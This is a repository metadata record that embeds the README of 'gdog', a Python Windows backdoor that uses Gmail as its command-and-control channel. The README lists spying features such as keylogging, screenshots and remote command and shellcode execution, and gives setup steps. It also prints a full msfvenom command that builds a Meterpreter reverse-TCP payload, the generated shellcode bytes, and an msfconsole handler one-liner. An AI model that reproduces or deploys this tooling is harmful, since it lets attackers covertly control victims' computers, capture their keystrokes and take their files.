{"id":14109913,"url":"https://github.com/maldevel/gdog","last_synced_at":"2025-04-05T08:09:16.718Z","repository":{"id":50301479,"uuid":"51454060","full_name":"maldevel/gdog","owner":"maldevel","description":"A fully featured Windows backdoor that uses Gmail as a C\u0026C server","archived":false,"fork":false,"pushed_at":"2019-06-27T19:12:45.000Z","size":50,"stargazers_count":498,"open_issues_count":3,"forks_count":167,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-03-29T07:09:31.023Z","etag":null,"topics":["backdoor","gmail","pentest","python","shellcode","windows","windows-backdoor"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/maldevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-02-10T16:31:46.000Z","updated_at":"2025-03-25T17:16:50.000Z","dependencies_parsed_at":"2022-08-27T18:21:16.791Z","dependency_job_id":null,"html_url":"https://github.com/maldevel/gdog","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fgdog","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fgdog/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fgdog/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fgdog/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/maldevel","download_url":"https://codeload.github.com/maldevel/gdog/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247305935,"owners_count":20917208,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","gmail","pentest","python","shellcode","windows","windows-backdoor"],"created_at":"2024-08-14T10:02:33.702Z","updated_at":"2025-04-05T08:09:16.691Z","avatar_url":"https://github.com/maldevel.png","language":"Python","funding_links":[],"categories":["Python","\u003ca id=\"d2041a55efcfc29ca6a257916255b43b\"\u003e\u003c/a\u003eGMail"],"sub_categories":["\u003ca id=\"be2346c808f9813f13da3526576e1839\"\u003e\u003c/a\u003e工具"],"readme":"Gdog\n====\nA stealthy Python based Windows backdoor that uses Gmail as a command and control server\n\nThis project was inspired by the gcat(https://github.com/byt3bl33d3r/gcat) from byt3bl33d3r.\n\n\nRequirements\n=====\n* Python 2.x\n* PyCrypto module\n* WMI module\n* Enum34 module\n* Netifaces module\n\n\nFeatures\n=====\n* Encrypted transportation messages (AES) + SHA256 hashing\n* Generate computer unique id using system information/characteristics (SHA256 hash)\n* Job IDs are random SHA256 hashes\n* Retrieve system information\n* Retrieve Geolocation information (City, Country, lat, long, etc..)\n* Retrieve running processes/system services/system users/devices (hardware)\n* Retrieve list of clients\n* Execute system command\n* Download files from client \n* Upload files to client\n* Execute shellcode\n* Take screenshot\n* Lock client's screen \n* Keylogger\n* Lock remote computer's screen\n* Shutdown/Restart remote computer\n* Log off current user\n* Download file from the WEB\n* Visit website\n* Show message box to user\n* Ability to change check-in time\n* Ability to add jitter to check-in time to reduce predictability \n\n\nSetup\n=====\nFor this to work you need:\n- A Gmail account (**Use a dedicated account! Do not use your personal one!**)\n- Turn on \"Allow less secure apps\" under the security settings of the account.\n- You may also have to enable IMAP in the account settings.\n\n\nDownload/Installation\n====\n* https://sourceforge.net/projects/pywin32\n* git clone https://github.com/maldevel/gdog\n* pip install -r requirements.txt\n\n\nContents\n=====\n- ```gdog.py``` a script that's used to enumerate and issue commands to available clients\n- ```client.py``` the actual backdoor to deploy\n\nYou're probably going to want to compile ```client.py``` into an executable using [Pyinstaller](https://github.com/pyinstaller/pyinstaller)\n\n**Note: It's recommended you compile client.py using a 32bit Python installation**\n\n\nUsage\n=====\n```\n                      __\n           ____ _____/ /___  ____ _\n          / __ `/ __  / __ \\/ __ `/\n         / /_/ / /_/ / /_/ / /_/ /\n         \\__, /\\__,_/\\____/\\__, /\n        /____/            /____/\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --version         show program's version number and exit\n  -id ID                Client to target\n  -jobid JOBID          Job id to retrieve\n\n  -list                 List available clients\n  -info                 Retrieve info on specified client\n\nCommands:\n  Commands to execute on an implant\n\n  -cmd CMD                Execute a system command\n  -visitwebsite URL       Visit website\n  -message TEXT TITLE     Show message to user\n  -tasks                  Retrieve running processes\n  -services               Retrieve system services\n  -users                  Retrieve system users\n  -devices                Retrieve devices(Hardware)\n  -download PATH          Download a file from a clients system\n  -download-fromurl URL\n                          Download a file from the web\n  -upload SRC DST         Upload a file to the clients system\n  -exec-shellcode FILE    Execute supplied shellcode on a client\n  -screenshot             Take a screenshot\n  -lock-screen            Lock the clients screen\n  -shutdown               Shutdown remote computer\n  -restart                Restart remote computer\n  -logoff                 Log off current remote user\n  -force-checkin          Force a check in\n  -start-keylogger        Start keylogger\n  -stop-keylogger         Stop keylogger\n  -email-checkin seconds  Seconds to wait before checking for new commands  \n  -jitter percentage      Percentage of Jitter\n```\n\n\nShellcode Exec\n=====\n\n```\n$ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python\n\nNo encoder or badchars specified, outputting raw payload\nPayload size: 354 bytes\nbuf =  \"\"\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0\\xb7\"\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\nbuf += \"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\nbuf += \"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\nbuf += \"\\xff\\xd5\\x6a\\x05\\x68\\xac\\x10\\x99\\x01\\x68\\x02\\x00\\x11\"\nbuf += \"\\x5c\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\"\nbuf += \"\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\nbuf += \"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\"\nbuf += \"\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\"\nbuf += \"\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\"\nbuf += \"\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\"\nbuf += \"\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\nbuf += \"\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\"\nbuf += \"\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\"\nbuf += \"\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\"\nbuf += \"\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\"\nbuf += \"\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\"\nbuf += \"\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\"\nbuf += \"\\x53\\xff\\xd5\"\n```\n\nGet rid of everything except for the shellcode and stick it in a file:\n\n```\n$ cat shell.txt \n\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x05\\x68\\xac\\x10\\x99\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\n```\nrun the console\n\n```\n ./msfconsole -x \"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST x.x.x.x; run\"\n ```\n \n \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaldevel%2Fgdog","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmaldevel%2Fgdog","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaldevel%2Fgdog/lists"}